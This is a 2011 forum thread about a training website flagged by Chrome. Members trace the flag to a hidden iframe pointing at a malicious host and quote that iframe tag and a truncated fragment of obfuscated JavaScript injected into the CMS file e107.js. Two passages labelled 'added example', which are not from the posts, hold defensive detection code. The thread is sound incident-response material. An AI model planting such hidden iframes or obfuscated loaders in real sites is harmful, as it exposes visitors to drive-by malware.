martin
« on: June 14, 2011, 10:38:28 AM »
We are receiving reports that some people are having problems with Epogee (the training site - http://epogee.co.uk) - as Google in its infinite wisdom is "blacking" it with false claims of dodgy software.... I've tested it with all sorts of browsers (except IE which I won't have in the house), and it appears to only happen using Chrome.......

Which boils down to "the great God Google has decreed (through its own idiocy, software glitch or malicious reporting by some business rival/refugee from the local home for the partially bewildered) to list your site as "dodgy" and to libellously suggest to any visitors that your site is evil, of Beelzebub himself, will cause warts and your offspring to be cursed unto the ninety fifth generation, and there's precisely f*** all you can do about it because we are omnipotent, all-pervading and can afford more lawyers than you - so s*d off worm - we may at some time reconsider, when it suits us, but we'll make it bloody difficult for you to even let us know we've made another damned balls up!" (Using their own damned scanning it shows "clean", therefore there is no facility to request they remove any "blacking".........)

To say that I'm hacked off would be the understatement of the year - I spent hours on a similar thing a month ago - there were no spam or malware links, eventually they removed the bans without a word of apology or explanation.........
Unpaid volunteer administrator and moderator (not employed by Navitron) - Views expressed are my own - curmudgeonly babyboomer! - http://www.farmco.co.uk

rondurrans
« Reply #1 on: June 14, 2011, 10:43:43 AM »
It works in IE but like you say not in Chrome.

Richard Owen
« Reply #2 on: June 14, 2011, 10:45:01 AM »
It's recent.
I use Chromium (Chrome before Google added bits) and I could access Epogee about a week ago but I can't today.
The reason (according to Chromium) is software on the site from dasq.cz.cc which sounds quite specific to me.
44 Yingli 230Wp panels feeding into 2x Solar Edge SE5000 inverters .20x 58mm SE, 20x 58mm SW, Solar Thermal feeding 320l thermal store. 10kW heat pump. 300W of Hydro Power .

martin
« Reply #3 on: June 14, 2011, 11:56:16 AM »
There isn't, nor a link thereto (I've checked it all) - even their own bally scanning software says it's "clean".......... 
Unpaid volunteer administrator and moderator (not employed by Navitron) - Views expressed are my own - curmudgeonly babyboomer! - http://www.farmco.co.uk

marshman
« Reply #4 on: June 14, 2011, 12:46:34 PM »
Martin,
I use Chrome and it does come up with the "blocked" message but I can also click on "proceed". When I do this the webpage is displayed and then my antivirus software jumps in with a message about a dodgy webpage ..... dasq.cz.cc ..... So I think there is something going on! (Screenshot attached)
regards
Roger
3.15kWpk (15xSharp ND210)/SB3000. & 3.675kWpk (15 x Suntech 245WD)/SB4000TL, Futurenergy FE1048 turbine/2 x Windmaster 500. Hunter Midi 20 wood burner with boiler driving Wirsbo underfloor heating. 10' x 7' solar wall (experimental)

wookey
« Reply #5 on: June 14, 2011, 01:06:46 PM »
You sure your antivirus isn't just asking google what it thinks about this page? And martin I assume you've gone over all the css and js and plugins files referenced on that page (and all the ones they reference, etc)?

aha. got it: there is a reference to the offending link here:

    /e107_plugins log/log.php?lv=cmVmZXJlcj0mY29sb3VyPTI0JmVzZWxmPWh0dHA6Ly9lcG9nZWUuY28udWsvcGFnZS5waHA/MiZyZXM9MTQ0MHg5MDA=">
    <script type="text/javascript" src="e107_plugins/ytm_gallery/scripts/check.js"></script>
    <script type="text/javascript" src="e107_plugins/ytm_gallery/scripts/behavior.js"></script>
    <script type="text/javascript" src="e107_plugins/ytm_gallery/scripts/rating.js"></script>
    <link rel="stylesheet" type="text/css" href="e107_plugins/ytm_gallery/css/rating.css">
    <meta name="description" content="Epogee Solar Water Heating Approved Training Course and other Renewable Energy Training Courses">
    <meta name="keywords" content="solar training course, solar water, solar water heating, hydro turbines, wind turbine, CHP, heat pumps, biodiesel training course">
    <meta name="copyright" content="Epogee Ltd">
    <meta name="author" content="Ivan Lucas">
    <link rel="icon" href=" http://epogee.co.uk/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href=" http://epogee.co.uk/favicon.ico" type="image/xicon">
    </head>
    <body onload="externalLinks();">
    <iframe src=" http://dasq.cz.cc/QQkFBwQHBQEDBwYBEkcJBQcEAQEDBAEBBg==" frameborder="0" height="0" width="0"></iframe>

I found that by using the iceweasel 'web developer plugin' and searching the 'generated source' - i.e. including all the subfiles. I'll leave it to you to work out where exactly it is coming from.
Wookey

martin
« Reply #6 on: June 14, 2011, 01:10:42 PM »
thanks!
Unpaid volunteer administrator and moderator (not employed by Navitron) - Views expressed are my own - curmudgeonly babyboomer! - http://www.farmco.co.uk

djh
« Reply #7 on: June 14, 2011, 01:22:01 PM »
FWIW, that reference isn't on the page as I retrieve it. There're no iframes at all. So unless you've already removed it, I guess it's being dynamically injected by some javascript.
Cheers, Dave
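
Wookey found the frame only in the generated source, and djh's plain fetch of the page shows no iframe at all, which is what script-injected markup looks like. The following is an added example (not code from the thread) that lists every iframe in the live DOM and marks those that are both off-site and invisible; the function names are made up for illustration.

```javascript
// Added example, not code from the thread. Run in the browser console on the
// affected page: findSuspectIframes(document, location.href)
// It inspects the live DOM, so frames inserted by script after load are included.

// True for "0", "0px", "0%" and similar values that collapse a frame to nothing.
function isZero(value) {
  return value !== null && /^\s*0+(\.0+)?\s*(px|%)?\s*$/i.test(String(value));
}

function findSuspectIframes(doc, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  for (const frame of doc.querySelectorAll('iframe')) {
    const src = (frame.getAttribute('src') || '').trim();
    let host;
    try {
      host = new URL(src, pageUrl).hostname; // resolves a relative src against the page
    } catch (err) {
      host = '(unparseable)';
    }
    const style = (frame.getAttribute('style') || '').replace(/\s+/g, '').toLowerCase();
    const hidden =
      isZero(frame.getAttribute('width')) ||
      isZero(frame.getAttribute('height')) ||
      /display:none|visibility:hidden/.test(style);
    const offSite = host !== pageHost;
    // A visible third-party embed is normal; an invisible one deserves a look.
    findings.push({ src, host, offSite, hidden, suspect: offSite && hidden });
  }
  return findings;
}
```

Each entry with `suspect: true` gives a host to search for in the site's scripts and templates.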

martin
« Reply #8 on: June 14, 2011, 01:45:39 PM »
pro tem I've "unplugged" the mentioned plugin and changed its name on the server - it's mentioned as being an "insecure" plugin, so hopefully I've stopped it working..... - any other suggestions gratefully welcomed
« Last Edit: June 14, 2011, 02:14:06 PM by martin »
Unpaid volunteer administrator and moderator (not employed by Navitron) - Views expressed are my own - curmudgeonly babyboomer! - http://www.farmco.co.uk

wookey
« Reply #9 on: June 14, 2011, 02:44:51 PM »
OK, we thought this was interesting (and I wanted to learn something about javascript and DOMs) so we've debugged it some more. The offending code (or at least some offending code) is found in http://epogee.co.uk/e107_files/e107.js

After function 'open_window' is some very dodgy-looking code:

    function taad9a06c0(n345d98){var hd2acc2b5=n345d98.substr(8,3)-493,x4d029ff7,sa94067,n345d98=n345d98.substr(c62b17847()),xfeb00=n345d98.length;for(var g1354b=0;g1354b<xfeb00;g1354b++){try{throw(ob4d04=n345d98.substr(g1354b,1));}catch(e){ob4d04=e;};if(ob4d04=='}'){hd2acc2b5="";g1354b++;j64f382=n345d98.substr(g1354b,1);while(u65d03c0(j64f382)){hd2acc2b5+=j64f382;g1354b++;j etc...

So, the infection is in the e107 javascript on the epogee server. That might have come from upstream when it was installed, it might have come from a local exploit on the server via FTP, or SSH brute-forcing, or it might have come via an exploit in other code being served (some php script or whatever with the rights to change the e107 code).

However it got there you need to clean that machine/virtual machine up. Just removing that function from the e107 code might get google off your back, but check the rest of the code carefully as obviously it's all suspect now. You really need to boot into a clean read-only environment and sanitize or re-image the box.

It presumably came from here: http://plugins.e107.org/ ? See if upstream has the same dodgy code or not.

Ivan now owes my colleague Ian Spray a favour for wading through the javascript tangle :-) HTH
Wookey

martin
« Reply #10 on: June 14, 2011, 02:51:24 PM »
Much appreciated - I'll have a rootle and sort it - I'm afraid it's very much "there be dragons" territory for me...... 
Unpaid volunteer administrator and moderator (not employed by Navitron) - Views expressed are my own - curmudgeonly babyboomer! - http://www.farmco.co.uk

martin
« Reply #11 on: June 14, 2011, 02:59:11 PM »
just done a "down and dirty" fix - downloaded a new version of the CMS and uploaded the 11kb current version of e107.js, overwriting the 13kb version that was there.......
Unpaid volunteer administrator and moderator (not employed by Navitron) - Views expressed are my own - curmudgeonly babyboomer! - http://www.farmco.co.uk
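
Wookey's suggestion to see whether upstream has the same code, and the 13kb versus 11kb e107.js in the post above, both come down to comparing the deployed files with a clean release. The following is an added example (not from the thread or the e107 project) for Node.js that hashes both trees and reports modified, added and missing files; the function names and the two directory arguments are illustrative.

```javascript
// Added example: compare a deployed web root against a clean copy of the same CMS release.
const fs = require('fs');
const path = require('path');
const crypto = require('crypto');

// Build a map of relative path -> { size, sha256 } for every regular file under root.
function snapshot(root, dir = root, out = new Map()) {
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      snapshot(root, full, out);
    } else if (entry.isFile()) {
      const data = fs.readFileSync(full);
      const sha256 = crypto.createHash('sha256').update(data).digest('hex');
      out.set(path.relative(root, full), { size: data.length, sha256 });
    }
  }
  return out;
}

// cleanRoot: freshly unpacked release; deployedRoot: a copy of what the server is serving.
function compareTrees(cleanRoot, deployedRoot) {
  const clean = snapshot(cleanRoot);
  const deployed = snapshot(deployedRoot);
  const report = { modified: [], added: [], missing: [] };
  for (const [file, info] of deployed) {
    const ref = clean.get(file);
    if (!ref) {
      report.added.push(file); // not part of the release: upload, plugin or planted file
    } else if (ref.sha256 !== info.sha256) {
      report.modified.push({ file, cleanSize: ref.size, deployedSize: info.size });
    }
  }
  for (const file of clean.keys()) {
    if (!deployed.has(file)) report.missing.push(file);
  }
  report.modified.sort((a, b) => a.file.localeCompare(b.file));
  report.added.sort();
  report.missing.sort();
  return report;
}
```

Run it against a copy of the web root pulled onto a trusted machine; configuration and uploaded content will appear under `added` or `modified` and need reading by hand.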

djh
« Reply #12 on: June 14, 2011, 03:21:14 PM »
Hmm, all the more reason to keep Javascript disabled, IMHO. And may also turn out to be a good example of why not to use systems written in PHP. I understand it's a nightmare to keep sites secure.
Cheers, Dave

wyleu
Guest
« Reply #13 on: June 14, 2011, 03:23:11 PM »
Sadly a lot of the modern world loves javascript and gets very sulky if you don't enable it.

djh
« Reply #14 on: June 14, 2011, 03:31:03 PM »
It's amazing how much does actually work. And it's not the modern world that gets sulky if it doesn't; it's me. Often they get an irritable email telling them why I won't do business with them.
Cheers, Dave